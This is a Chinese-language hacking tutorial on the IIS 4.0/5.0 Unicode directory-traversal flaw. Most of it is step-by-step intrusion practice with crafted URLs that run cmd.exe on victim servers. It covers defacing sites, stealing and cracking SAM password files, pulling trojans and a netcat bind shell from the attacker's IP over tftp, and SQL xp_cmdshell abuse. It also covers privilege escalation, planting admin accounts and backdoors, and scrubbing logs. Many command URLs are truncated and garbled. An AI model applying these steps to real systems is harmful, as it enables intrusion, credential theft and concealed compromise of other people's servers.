最近這些日子好多的WINNT的服務器被黑，尤其是國內的。下面是一些具體示例的總結。
下面這類型的漏洞以發現近一年多了，一年多前在國外的黑客網站就有了類似的文章，但
是當時 并沒有很多人重視。,在反北約的黑客戰中有很多就是用下面這些例子了。
不過直到UNICOUDE漏洞的發現，黑NT的計算機變的傻瓜化了。下面我把最近的一些文章總
結一下。
希望大家能從這里體會到點什么。（下面的文章來自一些郵件列表和BBS）


原理：(其實原來都很相似，我拿這個做個例子。)

NSFOCUS安全小組發現IIS 4.0和IIS 5.0在Unicode字符解碼的實現中存在一個安全漏洞，
導致用戶可以遠程通過IIS執行任意命令。當IIS打開文件時，如果該文件名包含unicode
字符，它會對其進行解碼，如果用戶提供一些特殊的編碼，將導致IIS錯誤的打開或者執
行某些web根目錄以外的文件。
對于IIS 5.0/4.0中文版，當IIS收到的URL請求的文件名中包含一個特殊的編碼例如"%c1%hh"
或者"%c0%hh",它會首先將其解碼變成:0xc10xhh， 然后嘗試打開這個文件，Windows 系統
認為0xc10xhh可能是unicode編碼，因此它會首先將其解碼，如果 0x00<= %hh < 0x40的話，
采用的 解碼的格式與下面的格式類似：
%c1%hh -> (0xc1 - 0xc0) * 0x40 + 0xhh
%c0%hh -> (0xc0 - 0xc0) * 0x40 + 0xhh
因此，利用這種編碼，我們可以構造很多字符，例如:
%c1%1c -> (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'
%c0%2f -> (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\'
攻擊者可以利用這個漏洞來繞過IIS的路徑檢查，去執行或者打開任意的文件。
(1) 如果系統包含某個可執行目錄，就可能執行任意系統命令。下面的URL可能
列出當前目錄的內容：
http://www.victim.com/scripts/..%c1.../cmd.exe?/c+dir
(2) 利用這個漏洞查看系統文件內容也是可能的：
http://www.victim.com/a.asp/..%c1%1..../winnt/win.ini
Rain Forest Puppy 測試發現對于英文版的IIS 4.0/5.0,此問題同樣
存在，只是編碼格式略有不同，變成"%c0%af"或者"%c1%9c".
下面我們的例子以%c1%1c為主講解。
注:+號可以用%20代替,依這種格式你還可以構造出許多命令
好多站點\inetpub\下的scripts目錄刪除了，
但\Program Files\Common Files\System\下
的msadc還在（有msadcs.dll漏洞的話就不用
%c1%1c了）。這時可以如下構造請求：
http://ip/msadc/..%c1%1c../..%c1%1c....exe?/c+dir+c:\


實踐一：（修改主頁----最簡單化的一種）

很多入侵都以修改主頁的形式表現出來，這通常有兩種情況：一是表達自己的
憤慨——比如當年以美國為首的北約悍然轟炸我駐南使館的突發事件之后，國內很多黑客
在ICQ、BBS一呼百應，紛紛對敵國進行各種形式的攻擊，當然以替換主頁最為大快人心！
二是在給網管發e-mail漏洞報告之后沒反應，有的黑客按耐不住，就用修改主頁的方式給
予警告， 用以引起人們對于安全技術的重視。當然說起來這是違法的啦，所以大家要注意
哦，不要光圖一時的痛快， 呵呵！
可以使用ECHO命令、管道符等建立文件，修改文件內容。但因為IIS加載程序檢測到有
CMD.EXE或者COMMAND.COM串就要檢測特殊字符“&|(,;%<>”，如果發現有這些字符就會返
回500錯誤，所以不能直接使用CMD.EEX加管道符等。因此可以采用拷貝CMD.EXE換名的方法
繞過去。
http://xxx.xxx.xxx.xxx/scripts/..%c...scripts\ccc.exe
然后
http://xxx.xxx.xxx.xxx/scripts/ccc....ked+by+chinese+>+f:\wwwroot\xxx\default.asp
http://xxx.xxx.xxx.xxx/scripts/ccc....+echo+1/1/2001+>>+f:\wwwroot\xxx\default.asp
就改了主頁了！
這種方法對于有負載均衡的主機很不方便，又需要幾次才能完成，所以不好。袁哥給出了
另一種更方便的辦法。參考袁哥（yuange）的帖子《IIS不用拷貝CMD.EXE使用管道符等的方
法》，可以這樣：
http://xxx.xxx.xxx.xxx/scripts/..%c...nt/system32/cmd".exe?/c+echo+Hacked+by+
hacker+>+f:\wwwroot\xxx\default.asp
http://xxx.xxx.xxx.xxx/scripts/..%c...nt/system32/cmd".exe?/c+echo+12/1/2k+>>+
f:\wwwroot\xxx\default.asp
這樣，主頁就被更改成了：
Hacked by hacker
12/1/2k
當然我是沒有這樣做啦，不過這些東西我都在自己配置的環境下實現了，

在我練習的過程中發現，用ECHO寫這些的時候很慢，如果你多次回車，過一陣屏幕刷新后
主頁上就會留下多個你要寫的內容。




實踐二（下載SAM文件）

http://xxx.xxx.xxx.xxx/scripts/..%c.../winnt/system32
/cmd.exe?/c+dir%20c:\發現列出了遠程主機C:\下的所有文件，
執行： http://xxx.xxx.xxx.xxx/scripts/..Á;../winnt/system32/cmd.exe?/c
+copy%20c:\autoexec.bat%20c:\autoexec.bak 成功實現文件的復制，
執行：http://xxx.xxx.xxx.xxx/scripts/..%c...winnt/system32/
cmd.exe?/c+del%20c:\autoexec.bak 成功實現文件的刪除，哇！太利害了。
隨便瀏覽了一下，因為是國內的主機，不想搞破壞，只想練練手！目的：
獲得Administrator權限。
執行：http://xxx.xxx.xxx.xxx/scripts/..%c...winnt/system32/
cmd.exe?/c+copy%20c:\winnt\repair\sam._%20c:\inetpub\wwwroot\
把sam._文件拷貝到wwwroot文件內，輸入：http://xxx.xxx.xxx.xxx/sam._
將sam._文件下載到本地，執行：
http://xxx.xxx.xxx.xxx/scripts/..%c...em32/cmd.exe?/c
+del%20c:\inetpub\wwwroot\sam._清除痕跡。
在本機執行：C:>expand sam._ sam
啟動l0phtcrack 2.5(可到http://rina.yofor.com/7index.html 下載），Import Sam
File... 導入sam文件，Open Wordlist File...
打開一個字典，Run Crack，乖乖，要17個小時，不管它，讓它慢慢破去，先睡個
覺先！五分鐘后來一看，Administrator 的 Nt Password 居然是 123456，我昏，
網管們注意了，這種密碼也可以取呀？執行：C:\>newletmein \\xxx.xxx.xxx -admin
掃描主機，發現管理員ID是：asdfghjk,執行：C:\>net use \\xxx.xxx.xxx.xxxc$
123456 /user:asdfghjk 成功聯上對方主機，大功告成！竄到存放日志的目錄：
winnt\system32\logfiles 看了看，呵呵！

實踐三（用木馬）

如果你對net use的使用不熟悉的話，可以找找相關的資料來看，net命令也是基本技
能啊，好好掌握吧) 在本地設定一個共享目錄，比如f:\123，把ncx99.exe和冰河服務
端放在里面，同時為了試驗， 放了一個0字節的1.txt；然后再tftp98中把目錄指向
f:\123，現在就要讓對方運行tftp.exe來下載文件啦！
http://xxx.xxx.xxx.xxx/scripts/cmd....wwwroot\scripts
然后
http://xxx.xxx.xxx.xxx/scripts/tftp...1.txt+cosys.txt
(111.111.111.111表示我們的ip，或者是我們的tftp服務器ip)
看，返回下面的內容：
CGI 錯誤
所指定的 CGI 應用程式處理有誤，它未傳回完整的 HTTP 標題。所傳回的標題是：

Transfer successful: 0 bytes in 2 seconds, 0 bytes/s
這就成功啦！看看：
http://xxx.xxx.xxx.xxx/scripts/sys.exe?/c+dir+1.txt
果然有的，哈，繼續：
http://xxx.xxx.xxx.xxx/scripts/tftp...exe+scripts.exe
現在繼續把冰河弄上去，國貨精品，也讓同胞們看看嘛！這是最方便的啦，哈哈！
http://xxx.xxx.xxx.xxx/scripts/tftp...em32\iinter.exe
返回：
CGI 錯誤
所指定的 CGI 應用程式處理有誤，它未傳回完整的 HTTP 標題。所傳回的標題是：

Transfer successful: 266240 bytes in 271 seconds, 982 bytes/s
成功啦，這樣，我們就可以先讓它中木馬啦！
http://xxx.xxx.xxx.xxx/scripts/..%c...tem32/inter.exe
之后，用客戶端連接過去，找到自己需要的東西，什么？你不知道你需要什么？
那你進去干什么？！學習啊？好啊，學到什么啦？總結一下，把紀錄刪掉（或者改
寫？覆蓋？你自己想吧）

實際四（暴力法和權限升級）

在WIN2000的命令提示符下

這樣輸入
c:\>newletmein xxx.xxx.xxx.xxx -all -g
xxx.xxx.xxx.xxx是你要攻擊的網站的IP地址
然后等待程序執行完畢，如果發現可用的用戶名和密碼，程序會告訴你，記住這個
用戶名和密碼，再這樣輸入(這里假設用戶名為ADMIN。密碼也是ADMIN）
c:\>net use \\XXX.XXX.XXX.XXX\IPC$ "ADMIN" /USER:"ADMIN"
程序顯示命令完成，接著來
c:\>copy c:\netsvc.exe \\xxx.xxx.xxx.xxx\admin$\system32
程序顯示1個文件COPY成功
接著來
c:\>copy c:\ntsrv.exe \\xxx.xxx.xxx.xxx\admin$\system32
程序顯示1個文件COPY成功
接著來
c:\>netsvc \\xxx.xxx.xxx.xxx schedule /start
等顯示成功，接著來,這里假設對方時間為13:00(這里可以用NET TIME看時間）
c:\>at \\xxx.xxx.xxx.xxx 13:00 ntsrv.exe /port:65432 /nomsg
程序會告訴你這個命令的ID號，等時間一到，用木馬連他的機器的65432端口
可以加上自己的密碼，和更改端口，目標搞定

2，目標開了WEB服務，IIS有漏洞msadcs.dll漏洞，這個漏洞可以用TWWWSCAN掃描
到，為了確認這個漏洞，你可以在瀏覽器的網址欄里輸入這個文件的具體路徑來確認
IE將顯示application/x_varg，說明這個漏洞存在，然后在PERL下，進行攻擊
C:\Perl\BIN>perl -x msadcs.txt -h xxx.xxx.xxx.xxx
Please type the NT commandline you want to run (cmd /c assumed):\n
cmd /c 一般這里我用TFTP上傳我的木馬文件，但首先你得先設置好你的TFTP主機
tftp -i 127.0.0.1 get ntsrv.exe c:\winnt\system32\ntsrv.exe
這里127.0.0.1 是我的TFTP主機，TFTP目錄下有NTSRV。EXE木馬
如果程序執行成功，TFTP會顯示文件傳輸的進度，然后再執行PERL，將木馬激活
，你再用木馬連上對方的機器，搞定

3，目標開了WEB服務，而且有SQL服務，一般SQL服務器開1433端口
如果WEB服務器用ASP等等。。。你如果能看到ASP或者GLOBAL。ASA的原碼，
而且把用戶名或者密碼寫在這里，OK，你已經差不多搞定拉
打開SQL SERVER 7。0 在client network uitlity里輸入對方IP，通訊選TCP/IP
端口選1433，然后應用確定，再打開query analyzer SERVER選你要攻擊的
IP，用戶名和密碼輸入，連接他，等會，連上拉
在上面這樣輸入
create proc #1 as exec master..xp_cmdsh*ll 'dir c:\'
go
exec #1
按F5執行，會顯示對方機器的文件目錄，然后用TFTP上傳你的木馬，并且執行，再用
木馬連接他搞定（需要注意的是PROC的號要執行1次換1個，單引號間是命令行）

4，目標開了WEB服務，IIS有漏洞，這里要說現在比較普遍的雙字節編碼漏洞。理論
這里不說，也說不好，照著干就可以拉。發現目標XXX。XXX。XXX。XXX
在瀏覽器里輸入
http://xxx.xxx.xxx.xxx/.idq
顯示路徑，WEB是在那里
http://xxx.xxx.xxx.xxx/scripts/..%c.../cmd.exe?/c+dir
這樣我們將得到對方的文件目錄
然后這樣
http://xxx.xxx.xxx.xxx/scripts/..%c...cmd.exe?/c+tftp -i 61.137.157.156
get ntsrv.exe c:\winnt\system32\ntsrv.exe
等文件傳完，再這樣
http://xxx.xxx.xxx.xxx/scripts/..%c...tem32\ntsrv.exe
木馬被啟動，用木馬連上，搞定。

如果權限不夠，我們下面來升級權限
自己C盤下的gasys.dll、cmd.exe和getadmin.exe到對方的E盤下，
（這三個文件是黑NT畢備的，很多站點可以下載到）

可以到DOS下輸入：(下面是NETUSE后的盤，如果不懂，先學NETUSE去)
C:\>copy c:\gasys.dll F:\
1 file(s) copied.
C:\>copy c:\cmd.exe F:\
1 file(s) copied.
C:\>copy c:\getadmin.exe F:\
1 file(s) copied.
至此為止，肉雞已經搞定了。現在我們要象主目標進行攻擊了。假設對方網站的ip
是127.1.1.1,先要把cmd.exe復制到scripts的目錄下面，并且要改名，假設對方的
物理盤為E ：
http://127.1.1.1/scripts/..Á;../winnt/system32/cmd.exe?/c+copy+e:
\winnt\system32\cmd.exe+e:\inetpub\scripts\hackercn .exe
這樣我們就已經把cmd.exe復制到了scripts的目錄下，并改名為hackercn.exe。現
在我們要用它把我們肉雞上的E盤影射為這個網站服務器上的Y 盤：
http://127.1.1.1/scripts/hackercn.e...:+\\127.1.1.2\E
然后把我們copy過去的那3個文件再copy到網站服務器上(cmd.exe雖然剛才已經copy

過去了，但因為改了名，所以還要再copy一次）：
http://127.1.1.1/scripts/..Á;../winnt/system32/cmd.exe?/c+copy+Y:
\gasys.dll+d:\inetpub\scripts\gasys.dll
http://127.1.1.1/scripts/..Á;../winnt/system32/cmd.exe?/c+copy+Y:
\cmd.exe+d:\inetpub\scripts\cmd.exe
http://127.1.1.1/scripts/..Á;../winnt/system32/cmd.exe?/c+copy+Y:
\getadmin.exe+d:\inetpub\scripts\getadmin.exe

好了，現在我們需要把“IUSR_計算機名”這個帳號升級為Administrator（并不是
每個站點都有“IUSR_計算機名”這個帳號）。假設這臺計算機名為“S ERVERS”，
那么我們可以這樣做： http://127.1.1.1/scripts/getadmin.exe?IUSR_SERVERS
這樣所有的訪問者都有了Administrator限權，
然后我們再來新建一個用戶名為hacker密碼為password的用戶：
http://127.1.1.1/script/cmd.exe?/c%...password%20/add
然后再把它授予Administrator限權:
http://127.1.1.1/scripts/getadmin.exe?hacker

下來就是進入該系統并制作后門了：
在nt的dos下輸入
C:\>net use \\127.1.1.1\ipc$ "password" /user:"hacker"
現在你已經登陸到了他的主機上，然后上傳木馬冰河：
C:\>copy C:\unzipped\newglacier\G_Server.exe \\127.1.1.1\admin$\system32
然后用net time來獲得對方的時間：
C:\>net time \\127.1.1.1
假設對方的時間是5點40，那么我們將在5點43啟動冰河程序：
C:\>at \\127.1.1.1 05:43 G_Server.exe

這樣我們就完整的實現了一次入侵，別忘了最后要打掃戰場
用冰河很討厭，我個人是不贊成用木馬的，我們可以上載其他端口程序。

實踐五（簡單實用）
我們假設1.29.58.9有這類型漏洞
myip就是我的IP，GIFT是我計算機上共享的文件名。我把NCx99.exe那個文件放到
這個目錄下了。 http://1.29.58.9/scripts/..%c1%1c.....+i:+\\myip\gift
時間要長點，多等一會兒。
成功后，你就可以用COPY命令，把NCX99.EXE文件從I盤CP過來了(放在system32或
你喜歡的目錄下)
http://xxx.xxx.xxx.xxx/scripts/..%c...ripts\ncx99.exe
啟動ncx99.exe
http://xxx.xxx.xxx.xxx/scripts/..%c...ripts\ncx99.exe
用telnet連上就可以了。
如果權限不夠可以用上面我們講的方法來增加權限。或添加用戶。

實踐六(打掃戰場)

打掃戰場
最后一步就是清除我們用到的一些臨時文件和測試的文件，偽裝一下日志，
免得被發現，這就叫做是打掃戰場。然后記得卸載冰河啊，我們不是過去破壞的，
只是為了學習和研究，熟悉入侵的手段和思想，學會分析問題，解決問題，為將來
的實戰做個練習而已嘛！
所以也不要修改主頁啦！給他們的網管留一份e-mail也好啦！
其實，我們傳上去的ncx99.exe是netcat的另一個版本，運行后，會把cmd.exe綁定
到99端口， 也就是說，運行以后，會在99端口偵聽，我們可以用telnet連接。
C:>telnet xxx.xxx.xxx.xxx 99
就看到：
c:\inetpub\scripts>
呵呵，現在就相當于進入他的機器啦，后面的東西不用繼續說了吧？鍵入exit退出
后，對方的ncx99也退出啦。如果你真的想要他的管理員賬號，那么，我想，最起碼
可以這樣：傳個紀錄鍵盤的東東上去，怎么樣？比你破解簡單多啦！你當然也可以
用冰河什么的。你也可以給自己建個賬號，方便自己，不過很可能會被發現的啦。
好啦好啦，不再說啦，煩死人了。
如果你用了木馬，就要想辦法去掉，要不就留到以后用。隨你了。
這么一次入侵完成了，我們至少要學會入侵的基本步驟，還有入侵的思維方式啦。
好好體會吧。

實用命令總結：

列目錄：
http://ip/msadc/..%c1%1c../..%c1%1c....exe?/c+dir+c:\
http://www.victim.com/scripts/..%c1....exe?/c+dir+c:\

Copy文件
http://xxx.xxx.xxx.xxx/scripts/..%c...netpub\wwwroot\
NET USE的使用
http://xxx.xxx.xxx.xxx/scripts/..%c...+i:+\\myip\temp

改CMD方法
http://xxx.xxx.xxx.xxx/scripts/..%c...scripts\ccc.exe
然后
http://xxx.xxx.xxx.xxx/scripts/ccc....ked+by+chinese+>+f:\wwwroot\xxx\default.asp

FIND命令使用
比如我要查看WEB目錄d:\inetpub\wwwroot下的所有asp、asa文件的內容：
http://xxx.xxx.xxx.xxx/scripts/..%c...find.exe?/n+/v+""+d:\inetpub\wwwroot\*.as*

添加用戶命令
新建一個用戶名為hacker密碼為password的用戶：
http://127.1.1.1/script/cmd.exe?/c%...password%20/add

當然命令是構造出來的，利用這些規則我們可以寫很多的類似的命令。
也希望大家把自己構造的好的想法和實現貼出來
如果你找不到目標可以去www.goole.com找。
它的危害大家我想都知道了。